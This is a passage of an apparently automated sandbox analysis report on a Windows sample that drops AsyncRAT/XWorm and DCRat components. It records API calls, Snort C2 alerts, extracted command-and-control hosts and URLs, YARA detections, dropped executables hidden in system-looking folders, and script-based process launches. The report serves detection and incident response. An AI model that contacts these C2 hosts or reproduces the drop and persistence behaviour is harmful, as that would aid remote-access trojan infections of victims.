Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Code function: 0_2_00007FF7C019ECE0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	0_2_00007FF7C019ECE0
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Code function: 0_2_00007FF7C01B3130 FindFirstFileExA,	0_2_00007FF7C01B3130
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 2_2_008DA5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	2_2_008DA5F4
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 2_2_008EB8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	2_2_008EB8E0

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.4:53174 -> 147.185.221.19:50230
Source: Traffic	Snort IDS: 2853193 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.4:53194 -> 147.185.221.19:50230

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: 127.0.0.1
Source: Malware configuration extractor	URLs: letter-takes.gl.at.ply.gg
Source: Malware configuration extractor	URLs: http://a0991799.xsph.ru/@=AjM2MDZ4kjN

Source: global traffic

TCP traffic: 192.168.2.4:53164 -> 147.185.221.19:50230

Source: Joe Sandbox View

IP Address: 147.185.221.19 147.185.221.19

Source: Joe Sandbox View

ASN Name: SALSGIVERUS SALSGIVERUS

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: letter-takes.gl.at.ply.gg

Source: XClient.exe, 00000003.00000002.4161351133.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, ServerWeb.exe, 00000008.00000002.1889481824.0000000002901000.00000004.00000800.00020000.00000000.sdmp

String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe

Window created: window name: CLIPBRDWNDCLASS

System Summary

Malicious sample detected (through community Yara rule)

Source: Result.exe, type: SAMPLE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 1.3.Result.exe.b10a30.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 1.0.Result.exe.7c9678.2.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 3.0.XClient.exe.480000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 1.0.Result.exe.7c9678.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 1.3.Result.exe.b10a30.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 1.2.Result.exe.b08218.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 1.0.Result.exe.466afd.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 1.0.Result.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 1.0.Result.exe.415eec.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000001.00000003.1702782236.0000000000B09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000003.00000000.1702689242.0000000000482000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000001.00000002.1703441913.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000001.00000000.1684955911.0000000000408000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe

Code function: 2_2_008D718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

2_2_008D718C

Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	File created: C:\Windows\IdentityCRL\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	File created: C:\Windows\IdentityCRL\d908c538d2e8d0
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	File created: C:\Windows\IME\IMEKR\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	File created: C:\Windows\IME\IMEKR\d908c538d2e8d0
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	File created: C:\Windows\ELAMBKUP\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	File created: C:\Windows\ELAMBKUP\d908c538d2e8d0

Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Code function: 0_2_00007FF7C01A09D8	0_2_00007FF7C01A09D8
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Code function: 0_2_00007FF7C0196294	0_2_00007FF7C0196294
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Code function: 0_2_00007FF7C018DC4C	0_2_00007FF7C018DC4C
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Code function: 0_2_00007FF7C019ECE0	0_2_00007FF7C019ECE0
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Code function: 0_2_00007FF7C019569C	0_2_00007FF7C019569C
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Code function: 0_2_00007FF7C01A400C	0_2_00007FF7C01A400C
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Code function: 0_2_00007FF7C018A8AC	0_2_00007FF7C018A8AC
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Code function: 0_2_00007FF7C018B948	0_2_00007FF7C018B948
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Code function: 0_2_00007FF7C018E91C	0_2_00007FF7C018E91C
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Code function: 0_2_00007FF7C01A400C	0_2_00007FF7C01A400C
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Code function: 0_2_00007FF7C01B59E0	0_2_00007FF7C01B59E0
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Code function: 0_2_00007FF7C019CA30	0_2_00007FF7C019CA30
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Code function: 0_2_00007FF7C01872AC	0_2_00007FF7C01872AC
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Code function: 0_2_00007FF7C018B318	0_2_00007FF7C018B318
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Code function: 0_2_00007FF7C01B5510	0_2_00007FF7C01B5510
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Code function: 0_2_00007FF7C01AFD18	0_2_00007FF7C01AFD18
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Code function: 0_2_00007FF7C01ABDF8	0_2_00007FF7C01ABDF8
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Code function: 0_2_00007FF7C018BF0C	0_2_00007FF7C018BF0C
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Code function: 0_2_00007FF7C01B2F24	0_2_00007FF7C01B2F24
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Code function: 0_2_00007FF7C01B9008	0_2_00007FF7C01B9008
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Code function: 0_2_00007FF7C01AC074	0_2_00007FF7C01AC074
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 2_2_008D857B	2_2_008D857B
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 2_2_008E70BF	2_2_008E70BF
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 2_2_008FD00E	2_2_008FD00E
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 2_2_008D407E	2_2_008D407E
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 2_2_00901194	2_2_00901194
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 2_2_008D3281	2_2_008D3281
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 2_2_008DE2A0	2_2_008DE2A0
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 2_2_008F02F6	2_2_008F02F6
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 2_2_008E6646	2_2_008E6646
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 2_2_008E37C1	2_2_008E37C1
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 2_2_008D27E8	2_2_008D27E8
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 2_2_008F070E	2_2_008F070E
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 2_2_008F473A	2_2_008F473A
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 2_2_008DE8A0	2_2_008DE8A0
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 2_2_008DF968	2_2_008DF968
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 2_2_008F4969	2_2_008F4969
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 2_2_008E3A3C	2_2_008E3A3C
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 2_2_008E6A7B	2_2_008E6A7B
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 2_2_008F0B43	2_2_008F0B43
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 2_2_008FCB60	2_2_008FCB60
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 2_2_008E5C77	2_2_008E5C77
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 2_2_008EFDFA	2_2_008EFDFA
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 2_2_008DED14	2_2_008DED14
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 2_2_008E3D6D	2_2_008E3D6D
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 2_2_008DBE13	2_2_008DBE13
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 2_2_008DDE6C	2_2_008DDE6C
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 2_2_008D5F3C	2_2_008D5F3C
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 2_2_008F0F78	2_2_008F0F78
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Code function: 3_2_00007FFD9B7C6406	3_2_00007FFD9B7C6406
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Code function: 3_2_00007FFD9B7C05A0	3_2_00007FFD9B7C05A0
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Code function: 3_2_00007FFD9B7C71B2	3_2_00007FFD9B7C71B2
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Code function: 8_2_00007FFD9B803555	8_2_00007FFD9B803555
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Code function: 8_2_00007FFD9B815B00	8_2_00007FFD9B815B00
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Code function: 37_2_00007FFD9B7C3555	37_2_00007FFD9B7C3555
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Code function: 38_2_00007FFD9B7C3555	38_2_00007FFD9B7C3555
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Code function: 41_2_00007FFD9B8033AC	41_2_00007FFD9B8033AC
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Code function: 41_2_00007FFD9B80C740	41_2_00007FFD9B80C740
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Code function: 41_2_00007FFD9B802B20	41_2_00007FFD9B802B20
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Code function: 41_2_00007FFD9B802B20	41_2_00007FFD9B802B20
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Code function: 41_2_00007FFD9B802B20	41_2_00007FFD9B802B20
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Code function: 41_2_00007FFD9B802B20	41_2_00007FFD9B802B20

Source: Joe Sandbox View	Dropped File: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe B59342163EA5752E627B1EB236F42A9882F15FDFF96CA77EBA7B20E416F4A4F3
Source: Joe Sandbox View	Dropped File: C:\Program Files (x86)\jDownloader\config\conhost.exe B59342163EA5752E627B1EB236F42A9882F15FDFF96CA77EBA7B20E416F4A4F3
Source: Joe Sandbox View	Dropped File: C:\Program Files\Uninstall Information\OfficeClickToRun.exe B59342163EA5752E627B1EB236F42A9882F15FDFF96CA77EBA7B20E416F4A4F3
Source: Joe Sandbox View	Dropped File: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe B59342163EA5752E627B1EB236F42A9882F15FDFF96CA77EBA7B20E416F4A4F3

Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: String function: 008EE28C appears 35 times
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: String function: 008EE360 appears 52 times
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: String function: 008EED00 appears 31 times

Source: Result.exe.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: Result.exe.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: Result.exe.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: ServerWeb.exe.2.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970

Source: ywXeiXEvP2.exe, 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmp

Binary or memory string: OriginalFilenameXClient.exe4 vs ywXeiXEvP2.exe

Source: Result.exe, type: SAMPLE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 1.3.Result.exe.b10a30.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 1.0.Result.exe.7c9678.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 3.0.XClient.exe.480000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 1.0.Result.exe.7c9678.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 1.3.Result.exe.b10a30.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 1.2.Result.exe.b08218.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 1.0.Result.exe.466afd.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 1.0.Result.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 1.0.Result.exe.415eec.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000001.00000003.1702782236.0000000000B09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000003.00000000.1702689242.0000000000482000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000001.00000002.1703441913.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000001.00000000.1684955911.0000000000408000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: XClient.exe.1.dr, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: XClient.exe.1.dr, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: XClient.exe.1.dr, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.0.Result.exe.466afd.1.raw.unpack, ef7UDCGv7gcEUFZT1op.cs	Cryptographic APIs: 'TransformBlock'
Source: 1.0.Result.exe.466afd.1.raw.unpack, ef7UDCGv7gcEUFZT1op.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.0.Result.exe.466afd.1.raw.unpack, g357BcsySpWm2aqpGZs.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 1.0.Result.exe.466afd.1.raw.unpack, g357BcsySpWm2aqpGZs.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 1.0.Result.exe.7c9678.2.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.0.Result.exe.7c9678.2.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.0.Result.exe.7c9678.2.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.3.Result.exe.b10a30.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.3.Result.exe.b10a30.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: XClient.exe.1.dr, Settings.cs	Base64 encoded string: 'rBjz7U/o2BFlwrIwGW6YVD/jeOSVunTMlvpBAz8+qFFueMbxy0zRw9MoYV6Lr0cj'
Source: 1.0.Result.exe.7c9678.2.raw.unpack, Settings.cs	Base64 encoded string: 'rBjz7U/o2BFlwrIwGW6YVD/jeOSVunTMlvpBAz8+qFFueMbxy0zRw9MoYV6Lr0cj'
Source: 1.3.Result.exe.b10a30.1.raw.unpack, Settings.cs	Base64 encoded string: 'rBjz7U/o2BFlwrIwGW6YVD/jeOSVunTMlvpBAz8+qFFueMbxy0zRw9MoYV6Lr0cj'

Source: 1.3.Result.exe.2642c39.0.raw.unpack, fCvAaGJbOISiMM9DuTO.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 1.3.Result.exe.2642c39.0.raw.unpack, fCvAaGJbOISiMM9DuTO.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.0.Result.exe.466afd.1.raw.unpack, fCvAaGJbOISiMM9DuTO.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 1.0.Result.exe.466afd.1.raw.unpack, fCvAaGJbOISiMM9DuTO.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.3.Result.exe.b10a30.1.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 1.3.Result.exe.b10a30.1.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: XClient.exe.1.dr, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: XClient.exe.1.dr, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.0.Result.exe.7c9678.2.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 1.0.Result.exe.7c9678.2.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.evad.winEXE@48/39@1/2

Source: C:\Users\user\Desktop\ywXeiXEvP2.exe

Code function: 0_2_00007FF7C0183BF8 GetLastError,FormatMessageW,LocalFree,

0_2_00007FF7C0183BF8

Source: C:\Users\user\Desktop\ywXeiXEvP2.exe

Code function: 0_2_00007FF7C019C260 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_00007FF7C019C260

Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe

File created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe

Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe

File created: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Mutant created: \Sessions\1\BaseNamedObjects\ke4QYmw58n6HyeTA
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\e78b700b17b507eb7e67e7d398bae13027208301
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7444:120:WilError_03

Source: C:\Users\user\Desktop\ywXeiXEvP2.exe

File created: C:\Users\user\AppData\Local\Temp\RarSFX0

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\hUqNkgIMv7nY24UYezK0etl.bat" "

Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe

Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\file.vbs"

Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Command line argument: sfxname	2_2_008ED5D4
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Command line argument: sfxstime	2_2_008ED5D4
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Command line argument: STARTDLG	2_2_008ED5D4

Source: ywXeiXEvP2.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
